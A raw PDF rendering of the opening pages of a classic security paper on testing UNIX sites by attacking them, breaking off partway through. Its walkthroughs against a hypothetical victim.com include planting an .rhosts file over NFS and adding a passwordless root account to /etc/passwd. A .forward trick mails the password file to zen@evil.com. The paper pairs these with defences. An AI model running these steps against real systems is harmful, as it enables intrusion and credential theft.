%PDF-1.5
%âãÏÓ
1 0 obj<>
endobj
2 0 obj<>
endobj
3 0 obj<>
endobj
5 0 obj null
endobj
6 0 obj<>
endobj
7 0 obj<>
endobj
8 0 obj<>>>
endobj
9 0 obj<>
endobj
10 0 obj<><><><><><><><><><><><><><><><><><><><><>]/C/SpdrArt/P 9 0 R/S/Article/Pg 11 0 R>>
endobj
11 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 0>>
endobj
12 0 obj<>
endobj
13 0 obj[10 0 R]
endobj
14 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 1>>
endobj
15 0 obj[10 0 R]
endobj
16 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 2>>
endobj
17 0 obj[10 0 R]
endobj
18 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 3>>
endobj
19 0 obj[10 0 R]
endobj
20 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 4>>
endobj
21 0 obj[10 0 R]
endobj
22 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 5>>
endobj
23 0 obj[10 0 R]
endobj
24 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 6>>
endobj
25 0 obj[10 0 R]
endobj
26 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 7>>
endobj
27 0 obj[10 0 R]
endobj
28 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 8>>
endobj
29 0 obj[10 0 R]
endobj
30 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 9>>
endobj
31 0 obj[10 0 R]
endobj
32 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 10>>
endobj
33 0 obj<>
endobj
34 0 obj<>
endobj
35 0 obj<>
endobj
36 0 obj<>
endobj
37 0 obj<>
endobj
40 0 obj[10 0 R]
endobj
41 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 11>>
endobj
44 0 obj[10 0 R]
endobj
45 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 12>>
endobj
48 0 obj[10 0 R]
endobj
49 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 13>>
endobj
52 0 obj[10 0 R]
endobj
53 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 14>>
endobj
56 0 obj[10 0 R]
endobj
57 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 15>>
endobj
58 0 obj<>
endobj
59 0 obj<>
endobj
62 0 obj[10 0 R]
endobj
63 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 16>>
endobj
66 0 obj[10 0 R]
endobj
67 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 17>>
endobj
70 0 obj[10 0 R]
endobj
71 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 18>>
endobj
74 0 obj[10 0 R]
endobj
75 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 19>>
endobj
78 0 obj[10 0 R]
endobj
79 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 20>>
endobj
80 0 obj<>
endobj
83 0 obj[10 0 R]
endobj
84 0 obj<>/Subtype/Link/A<ftp://archive.cis.ohio-state.edu/pub/cops/1.04+/
The tcp wrappers are available via anonymous ftp from>>>
endobj
85 0 obj[84 0 R 86 0 R 87 0 R 88 0 R 89 0 R 90 0 R 91 0 R 92 0 R 93 0 R]
endobj
86 0 obj<>/Subtype/Link/A<ftp://archive.cis.ohio-state.edu/pub/cops/1.04+/
The tcp wrappers are available via anonymous ftp from>>>
endobj
87 0 obj<>/Subtype/Link/A<>>>
endobj
88 0 obj<>/Subtype/Link/A<>>>
endobj
89 0 obj<>/Subtype/Link/A<>>>
endobj
90 0 obj<>/Subtype/Link/A<>>>
endobj
91 0 obj<>/Subtype/Link/A<>>>
endobj
92 0 obj<>/Subtype/Link/A<>>>
endobj
93 0 obj<>/Subtype/Link/A<>>>
endobj
94 0 obj<>/ProcSet[/PDF/Text]>>/StructParents 21>>
endobj
97 0 obj[10 0 R]
endobj
114 0 obj<>
endobj
115 0 obj<>
endobj
118 0 obj<>
endobj
119 0 obj[120 0 R]
endobj
120 0 obj<>
endobj
121 0 obj<>
endobj
122 0 obj<>
endobj
123 0 obj 3706
endobj
124 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
24.76923 0 0 24.76923 10 725.29675 Tm
(Improving the Security of Your Site by Breaking )Tj
0 -1.2 TD
(Into it )Tj
/T1_2 1 Tf
14 0 0 14 10 656.46198 Tm
( Dan Farmer Wietse Venema)Tj
T*
( Sun Microsystems Eindhoven University of Technology)Tj
T*
( zen@sun.com wietse@wzv.win.tue.nl)Tj
/T1_1 1 Tf
19.38461 0 0 19.38461 10 582.1687 Tm
(Introduction)Tj
/T1_0 1 Tf
14 0 0 14 10 544.86786 Tm
(Every day, all over the world, computer networks and hosts are being bro\
ken into. The level of )Tj
T*
(sophistication of these attacks varies widely; while it is generally bel\
ieved that most break-ins succeed )Tj
T*
(due to weak passwords, there are still a large number of intrusions that\
use more advanced techniques to )Tj
T*
(break in. Less is known about the latter types of break-ins, because by \
their very nature they are much )Tj
T*
(harder to detect. )Tj
0 -2.55714 TD
(CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley. Purdue. Sun. \
You name it, we've )Tj
0 -1.2 TD
(seen it broken into. Anything that is on the Internet \(and many that is\
n't\) seems to be fairly easy game. )Tj
T*
(Are these targets unusual? What happened? )Tj
ET
0.5 0.5 0.5 rg
10 375.49231 m
10 377.49231 l
602 377.49231 l
601 376.49231 l
11 376.49231 l
11 376.49231 l
h
f
0.875 0.875 0.875 rg
602 377.49231 m
602 375.49231 l
10 375.49231 l
11 376.49231 l
601 376.49231 l
601 376.49231 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
19.38461 0 0 19.38461 10 332.50717 Tm
(Fade to...)Tj
/T1_0 1 Tf
14 0 0 14 10 295.20633 Tm
(A young boy, with greasy blonde hair, sitting in a dark room. The room i\
s illuminated only by the )Tj
T*
(luminescense of the C64's 40 character screen. Taking another long drag \
from his Benson and Hedges )Tj
T*
(cigarette, the weary system cracker telnets to the next faceless ".mil" \
site on his hit list. "guest -- guest", )Tj
T*
("root -- root", and "system -- manager" all fail. No matter. He has all \
night... he pencils the host off of )Tj
T*
(his list, and tiredly types in the next potential victim... )Tj
0 -2.55714 TD
(This seems to be the popular image of a system cracker. Young, inexperie\
nced, and possessing vast )Tj
0 -1.2 TD
(quantities of time to waste, to get into just one more system. However, \
there is a far more dangerous )Tj
T*
(type of system cracker out there. One who knows the ins and outs of the \
latest security auditing and )Tj
T*
(cracking tools, who can modify them for specific attacks, and who can wr\
ite his/her own programs. One )Tj
T*
(who not only reads about the latest security holes, but also personally \
discovers bugs and vulnerabilities. )Tj
T*
(A deadly creature that can both strike poisonously and hide its tracks w\
ithout a whisper or hint of a trail. )Tj
T*
(The uebercracker is here. )Tj
ET
0.5 0.5 0.5 rg
10 58.63077 m
10 60.63077 l
602 60.63077 l
601 59.63077 l
11 59.63077 l
11 59.63077 l
h
f
0.875 0.875 0.875 rg
602 60.63077 m
602 58.63077 l
10 58.63077 l
11 59.63077 l
601 59.63077 l
601 59.63077 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 39.60632 Tm
(Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's uebe\
rmensch, or, literally )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(1 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:37)Tj
ET
EMC
endstream
endobj
125 0 obj 4396
endobj
126 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 752.80627 Tm
(translated into English, "over man." Nietzsche used the term not to refe\
r to a comic book superman, but )Tj
0 -1.2 TD
(instead a man who had gone beyond the incompetence, pettiness, and weakn\
ess of the everyday man. )Tj
T*
(The uebercracker is therefore the system cracker who has gone beyond sim\
ple cookbook methods of )Tj
T*
(breaking into systems. An uebercracker is not usually motivated to perfo\
rm random acts of violence. )Tj
T*
(Targets are not arbitrary -- there is a purpose, whether it be personal \
monetary gain, a hit and run raid for )Tj
T*
(information, or a challenge to strike a major or prestigious site or net\
.personality. An uebercracker is )Tj
T*
(hard to detect, harder to stop, and hardest to keep out of your site for\
good. )Tj
/T1_1 1 Tf
19.38461 0 0 19.38461 10 611.24561 Tm
(Overview)Tj
/T1_0 1 Tf
14 0 0 14 10 573.94476 Tm
(In this paper we will take an unusual approach to system security. Inste\
ad of merely saying that )Tj
T*
(something is a problem, we will look through the eyes of a potential int\
ruder, and show _why_ it is one. )Tj
T*
(We will illustrate that even seemingly harmless network services can bec\
ome valuable tools in the )Tj
T*
(search for weak points of a system, even when these services are operati\
ng exactly as they are intended )Tj
T*
(to. )Tj
0 -2.55714 TD
(In an effort to shed some light on how more advanced intrusions occur, t\
his paper outlines various )Tj
0 -1.2 TD
(mechanisms that crackers have actually used to obtain access to systems \
and, in addition, some )Tj
T*
(techniques we either suspect intruders of using, or that we have used ou\
rselves in tests or in friendly/)Tj
T*
(authorized environments. )Tj
0 -2.55714 TD
(Our motivation for writing this paper is that system administrators are \
often unaware of the dangers )Tj
0 -1.2 TD
(presented by anything beyond the most trivial attacks. While it is widel\
y known that the proper level of )Tj
T*
(protection depends on what has to be protected, many sites appear to lac\
k the resources to assess what )Tj
T*
(level of host and network security is adequate. By showing what intruder\
s can do to gain access to a )Tj
T*
(remote site, we are trying to help system administrators to make _inform\
ed_ decisions on how to secure )Tj
T*
(their site -- or not. We will limit the discussion to techniques that ca\
n give a remote intruder access to a )Tj
T*
(\(possibly non-interactive\) shell process on a UNIX host. Once this is \
achieved, the details of obtaining )Tj
T*
(root privilege are beyond the scope of this work -- we consider them too\
site-dependent and, in many )Tj
T*
(cases, too trivial to merit much discussion. )Tj
0 -2.55714 TD
(We want to stress that we will not merely run down a list of bugs or sec\
urity holes -- there will always )Tj
0 -1.2 TD
(be new ones for a potential attacker to exploit. The purpose of this pap\
er is to try to get the reader to )Tj
T*
(look at her or his system in a new way -- one that will hopefully afford\
him or her the opportunity to )Tj
T*
(_understand_ how their system can be compromised, and how. )Tj
0 -2.55714 TD
(We would also like to reiterate to the reader that the purpose of this p\
aper is to show you how to test the )Tj
0 -1.2 TD
(security of your own site, not how to break into other people's systems.\
The intrusion techniques we )Tj
T*
(illustrate here will often leave traces in your system auditing logs -- \
it might be constructive to examine )Tj
T*
(them after trying some of these attacks out, to see what a real attack m\
ight look like. Certainly other sites )Tj
T*
(and system administrators will take a very dim view of your activities i\
f you decide to use their hosts for )Tj
T*
(security testing without advance authorization; indeed, it is quite poss\
ible that legal action may be )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(2 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
127 0 obj 4394
endobj
128 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(pursued against you if they perceive it as an attack. )Tj
0 -2.55714 TD
(There are four main parts to the paper. The first part is the introducti\
on and overview. The second part )Tj
0 -1.2 TD
(attempts to give the reader a feel for what it is like to be an intruder\
and how to go from knowing )Tj
T*
(nothing about a system to compromising its security. This section goes o\
ver actual techniques to gain )Tj
T*
(information and entrance and covers basic strategies such as exploiting \
trust and abusing improperly )Tj
T*
(configured basic network services \(ftp, mail, tftp, etc.\) It also disc\
usses slightly more advanced topics, )Tj
T*
(such as NIS and NFS, as well as various common bugs and configuration pr\
oblems that are somewhat )Tj
T*
(more OS or system specific. Defensive strategies against each of the var\
ious attacks are also covered )Tj
T*
(here. )Tj
0 -2.55714 TD
(The third section deals with trust: how the security of one system depen\
ds on the integrity of other )Tj
0 -1.2 TD
(systems. Trust is the most complex subject in this paper, and for the sa\
ke of brevity we will limit the )Tj
T*
(discussion to clients in disguise. )Tj
0 -2.55714 TD
(The fourth section covers the basic steps that a system administrator ma\
y take to protect her or his )Tj
0 -1.2 TD
(system. Most of the methods presented here are merely common sense, but \
they are often ignored in )Tj
T*
(practice -- one of our goals is to show just how dangerous it can be to \
ignore basic security practices. )Tj
0 -2.55714 TD
(Case studies, pointers to security-related information, and software are\
described in the appendices at the )Tj
0 -1.2 TD
(end of the paper. )Tj
0 -2.55714 TD
(While exploring the methods and strategies discussed in this paper we we\
wrote SATAN \(Security )Tj
0 -1.2 TD
(Analysis Tool for Auditing Networks.\) Written in shell, perl, expect an\
d C, it examines a remote host or )Tj
T*
(set of hosts and gathers as much information as possible by remotely pro\
bing NIS, finger, NFS, ftp and )Tj
T*
(tftp, rexd, and other services. This information includes the presence o\
f various network information )Tj
T*
(services as well as potential security flaws -- usually in the form of i\
ncorrectly setup or configured )Tj
T*
(network services, well-known bugs in system or network utilities, or poo\
r or ignorant policy decisions. It )Tj
T*
(then can either report on this data or use an expert system to further i\
nvestigate any potential security )Tj
T*
(problems. While SATAN doesn't use all of the methods that we discuss in \
the paper, it has succeeded )Tj
T*
(with ominous regularity in finding serious holes in the security of Inte\
rnet sites. It will be posted and )Tj
T*
(made available via anonymous ftp when completed; Appendix A covers its s\
alient features. )Tj
0 -2.55714 TD
(Note that it isn't possible to cover all possible methods of breaking in\
to systems in a single paper. )Tj
0 -1.2 TD
(Indeed, we won't cover two of the most effective methods of breaking int\
o hosts: social engineering and )Tj
T*
(password cracking. The latter method is so effective, however, that seve\
ral of the strategies presented )Tj
T*
(here are geared towards acquiring password files. In addition, while win\
dowing systems \(X, )Tj
T*
(OpenWindows, etc.\) can provide a fertile ground for exploitation, we si\
mply don't know many methods )Tj
T*
(that are used to break into remote systems. Many system crackers use non\
-bitmapped terminals which )Tj
T*
(can prevent them from using some of the more interesting methods to expl\
oit windowing systems )Tj
T*
(effectively \(although being able to monitor the victim's keyboard is of\
ten sufficient to capture )Tj
T*
(passwords\). Finally, while worms, viruses, trojan horses, and other mal\
ware are very interesting, they )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(3 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
129 0 obj 3416
endobj
130 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(are not common \(on UNIX systems\) and probably will use similar techniq\
ues to the ones we describe in )Tj
0 -1.2 TD
(this paper as individual parts to their attack strategy. )Tj
/T1_1 1 Tf
19.38461 0 0 19.38461 10 696.41486 Tm
(Gaining Information)Tj
/T1_0 1 Tf
14 0 0 14 10 659.11401 Tm
(Let us assume that you are the head system administrator of Victim Incor\
porated's network of UNIX )Tj
T*
(workstations. In an effort to secure your machines, you ask a friendly s\
ystem administrator from a )Tj
T*
(nearby site \(evil.com\) to give you an account on one of her machines s\
o that you can look at your own )Tj
T*
(system's security from the outside. )Tj
0 -2.55714 TD
(What should you do? First, try to gather information about your \(target\
\) host. There is a wealth of )Tj
0 -1.2 TD
(network services to look at: finger, showmount, and rpcinfo are good sta\
rting points. But don't stop there )Tj
T*
(-- you should also utilize DNS, whois, sendmail \(smtp\), ftp, uucp, and\
as many other services as you can )Tj
T*
(find. There are so many methods and techniques that space precludes us f\
rom showing all of them, but )Tj
T*
(we will try to show a cross-section of the most common and/or dangerous \
strategies that we have seen or )Tj
T*
(have thought of. Ideally, you would gather such information about all ho\
sts on the subnet or area of )Tj
T*
(attack --- information is power -- but for now we'll examine only our in\
tended target. )Tj
0 -2.55714 TD
(To start out, you look at what the ubiquitous finger command shows you \(\
assume it is 6pm, Nov 6, )Tj
0 -1.2 TD
(1993\): )Tj
/T1_2 1 Tf
0 -2.56195 TD
( victim % finger @victim.com)Tj
0 -1.2 TD
( [victim.com])Tj
T*
( Login Name TTY Idle When Where)Tj
T*
( zen Dr. Fubar co 1d Wed 08:00 death.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(Good! A single idle user -- it is likely that no one will notice if you \
actually manage to break in. )Tj
0 -2.55714 TD
(Now you try more tactics. As every finger devotee knows, fingering "@", \
"0", and "", as well as )Tj
0 -1.2 TD
(common names, such as root, bin, ftp, system, guest, demo, manager, etc.\
, can reveal interesting )Tj
T*
(information. What that information is depends on the version of finger t\
hat your target is running, but )Tj
T*
(the most notable are account names, along with their home directories an\
d the host that they last logged )Tj
T*
(in from. )Tj
0 -2.55714 TD
(To add to this information, you can use rusers \(in particular with the \
-l flag\) to get useful information on )Tj
0 -1.2 TD
(logged-in users. )Tj
0 -2.55714 TD
(Trying these commands on victim.com reveals the following information, p\
resented in a compressed )Tj
0 -1.2 TD
(tabular form to save space: )Tj
/T1_2 1 Tf
0 -2.56197 TD
( Login Home-dir Shell Last login, from where)Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(4 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
131 0 obj 2951
endobj
132 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 753.90814 Tm
( ----- -------- ----- ----------------------)Tj
0 -1.2 TD
( root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.)Tj
T*
(victim.com)Tj
T*
( bin /bin Never logged in)Tj
T*
( nobody / Tue Jun 15 08:57 on ttyp2 from server.)Tj
T*
(victim.co)Tj
T*
( daemon / Tue Mar 23 12:14 on ttyp0 from big.)Tj
T*
(victim.com)Tj
T*
( sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.)Tj
T*
(victim.com)Tj
T*
( zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from )Tj
T*
(death.com)Tj
T*
( sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.)Tj
T*
(com)Tj
T*
( guest /export/foo /bin/sh Never logged in)Tj
T*
( ftp /home/ftp Never logged in)Tj
/T1_0 1 Tf
0 -2.55232 TD
(Both our experiments with SATAN and watching system crackers at work hav\
e proved to us that finger )Tj
0 -1.2 TD
(is one of the most dangerous services, because it is so useful for inves\
tigating a potential target. )Tj
T*
(However, much of this information is useful only when used in conjunctio\
n with other data. )Tj
0 -2.55714 TD
(For instance, running showmount on your target reveals: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % showmount -e victim.com)Tj
0 -1.2 TD
( export list for victim.com:)Tj
T*
( /export \(everyone\))Tj
T*
( /var \(everyone\))Tj
T*
( /usr easy)Tj
T*
( /export/exec/kvm/sun4c.sunos.4.1.3 easy)Tj
T*
( /export/root/easy easy)Tj
T*
( /export/swap/easy easy)Tj
/T1_0 1 Tf
0 -2.55232 TD
(Note that /export/foo is exported to the world; also note that this is u\
ser guest's home directory. Time for )Tj
0 -1.2 TD
(your first break-in! In this case, you'll mount the home directory of us\
er "guest." Since you don't have a )Tj
T*
(corresponding account on the local machine and since root cannot modify \
files on an NFS mounted )Tj
T*
(filesystem, you create a "guest" account in your local password file. As\
user guest you can put an .rhosts )Tj
T*
(entry in the remote guest home directory, which will allow you to login \
to the target machine without )Tj
T*
(having to supply a password. )Tj
/T1_1 1 Tf
0 -2.56195 TD
( evil # mount victim.com:/export/foo /foo)Tj
0 -1.2 TD
( evil # cd /foo)Tj
T*
( evil # ls -lag)Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(5 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
133 0 obj 2958
endobj
134 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 753.90814 Tm
( total 3)Tj
0 -1.2 TD
( 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .)Tj
T*
( 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..)Tj
T*
( 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest)Tj
T*
( evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/)Tj
T*
(passwd)Tj
T*
( evil # ls -lag)Tj
T*
( total 3)Tj
T*
( 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .)Tj
T*
( 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..)Tj
T*
( 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest)Tj
T*
( evil # su guest)Tj
T*
( evil % echo victim.com >> guest/.rhosts)Tj
T*
( evil % rlogin victim.com)Tj
T*
( Welcome to victim.com!)Tj
T*
( victim %)Tj
/T1_0 1 Tf
0 -2.55232 TD
(If, instead of home directories, victim.com were exporting filesystems w\
ith user commands \(say, /usr or /)Tj
0 -1.2 TD
(usr/local/bin\), you could replace a command with a trojan horse that ex\
ecutes any command of your )Tj
T*
(choice. The next user to execute that command would execute your program\
. )Tj
0 -2.55714 TD
(We suggest that filesystems be exported: )Tj
/T1_2 1 Tf
7 0 0 7 35.713 360.97556 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 360.97556 Tm
(Read/write only to specific, trusted clients. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 325.17554 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 325.17554 Tm
(Read-only, where possible \(data or programs can often be exported in th\
is manner.\) )Tj
-2.85715 -2.55714 Td
(If the target has a "+" wildcard in its /etc/hosts.equiv \(the default i\
n various vendor's machines\) or has )Tj
0 -1.2 TD
(the netgroups bug \(CERT advisory 91:12\), any non-root user with a logi\
n name in the target's password )Tj
T*
(file can rlogin to the target without a password. And since the user "bi\
n" often owns key files and )Tj
T*
(directories, your next attack is to try to log in to the target host and\
modify the password file to let you )Tj
T*
(have root access: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % whoami)Tj
0 -1.2 TD
( bin)Tj
T*
( evil % rsh victim.com csh -i)Tj
T*
( Warning: no access to tty; thus no job control in this shell...)Tj
T*
( victim % ls -ldg /etc)Tj
T*
( drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc)Tj
T*
( victim % cd /etc)Tj
T*
( victim % mv passwd pw.old)Tj
T*
( victim % \(echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old \) \
)Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(6 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
135 0 obj 3617
endobj
136 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 753.90814 Tm
(> passwd)Tj
0 -1.2 TD
( victim % ^D)Tj
T*
( evil % rlogin victim.com -l toor)Tj
T*
( Welcome to victim.com!)Tj
T*
( victim #)Tj
/T1_0 1 Tf
0 -2.55232 TD
(A few notes about the method used above; "rsh victim.com csh -i" is used\
to initially get onto the system )Tj
0 -1.2 TD
(because it doesn't leave any traces in the wtmp or utmp system auditing \
files, making the rsh invisible )Tj
T*
(for finger and who. The remote shell isn't attached to a pseudo-terminal\
, however, so that screen-)Tj
T*
(oriented programs such as pagers and editors will fail -- but it is very\
handy for brief exploration. )Tj
0 -2.55714 TD
(The COPS security auditing tool \(see appendix D\) will report key files\
or directories that are writable to )Tj
0 -1.2 TD
(accounts other than the superuser. If you run SunOS 4.x you can apply pa\
tch 100103 to fix most file )Tj
T*
(permission problems. On many systems, rsh probes as shown above, even wh\
en successful, would )Tj
T*
(remain completely unnoticed; the tcp wrapper \(appendix D\), which logs \
incoming connections, can help )Tj
T*
(to expose such activities. )Tj
ET
0.5 0.5 0.5 rg
10 464.80002 m
10 466.80002 l
602 466.80002 l
601 465.80002 l
11 465.80002 l
11 465.80002 l
h
f
0.875 0.875 0.875 rg
602 466.80002 m
602 464.80002 l
10 464.80002 l
11 465.80002 l
601 465.80002 l
601 465.80002 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 445.77554 Tm
(What now? Have you uncovered all the holes on your target system? Not by\
a long shot. Going back to )Tj
T*
(the finger results on your target, you notice that it has an "ftp" accou\
nt, which usually means that )Tj
T*
(anonymous ftp is enabled. Anonymous ftp can be an easy way to get access\
, as it is often misconfigured. )Tj
T*
(For example, the target may have a complete copy of the /etc/passwd file\
in the anonymous ftp ~ftp/etc )Tj
T*
(directory instead of a stripped down version. In this example, though, y\
ou see that the latter doesn't seem )Tj
T*
(to be true \(how can you tell without actually examining the file?\) How\
ever, the home directory of ftp on )Tj
T*
(victim.com is writable. This allows you to remotely execute a command --\
in this case, mailing the )Tj
T*
(password file back to yourself -- by the simple method of creating a .fo\
rward file that executes a )Tj
T*
(command when mail is sent to the ftp account. This is the same mechanism\
of piping mail to a program )Tj
T*
(that the "vacation" program uses to automatically reply to mail messages\
. )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % cat forward_sucker_file)Tj
0 -1.2 TD
( "|/bin/mail zen@evil.com < /etc/passwd")Tj
0 -2.39999 TD
( evil % ftp victim.com)Tj
0 -1.2 TD
( Connected to victim.com)Tj
T*
( 220 victim FTP server ready.)Tj
T*
( Name \(victim.com:zen\): ftp)Tj
T*
( 331 Guest login ok, send ident as password.)Tj
T*
( Password:)Tj
T*
( 230 Guest login ok, access restrictions apply.)Tj
T*
( ftp> ls -lga)Tj
T*
( 200 PORT command successful.)Tj
T*
( 150 ASCII data connection for /bin/ls \(192.192.192.1,1129\) \(0 bytes\)\
.)Tj
T*
( total 5)Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(7 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
137 0 obj 2916
endobj
138 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 753.50812 Tm
( drwxr-xr-x 4 101 1 512 Jun 20 1991 .)Tj
0 -1.2 TD
( drwxr-xr-x 4 101 1 512 Jun 20 1991 ..)Tj
T*
( drwxr-xr-x 2 0 1 512 Jun 20 1991 bin)Tj
T*
( drwxr-xr-x 2 0 1 512 Jun 20 1991 etc)Tj
T*
( drwxr-xr-x 3 101 1 512 Aug 22 1991 pub)Tj
T*
( 226 ASCII Transfer complete.)Tj
T*
( 242 bytes received in 0.066 seconds \(3.6 Kbytes/s\))Tj
T*
( ftp> put forward_sucker_file .forward)Tj
T*
( 43 bytes sent in 0.0015 seconds \(28 Kbytes/s\))Tj
T*
( ftp> quit)Tj
T*
( evil % echo test | mail ftp@victim.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(Now you simply wait for the password file to be sent back to you. )Tj
0 -2.55714 TD
(The security auditing tool COPS will check your anonymous ftp setup; see\
the man page for ftpd, the )Tj
0 -1.2 TD
(documentation/code for COPS, or CERT advisory 93:10 for information on h\
ow to set up anonymous )Tj
T*
(ftp correctly. Vulnerabilities in ftp are often a matter of incorrect ow\
nership or permissions of key files )Tj
T*
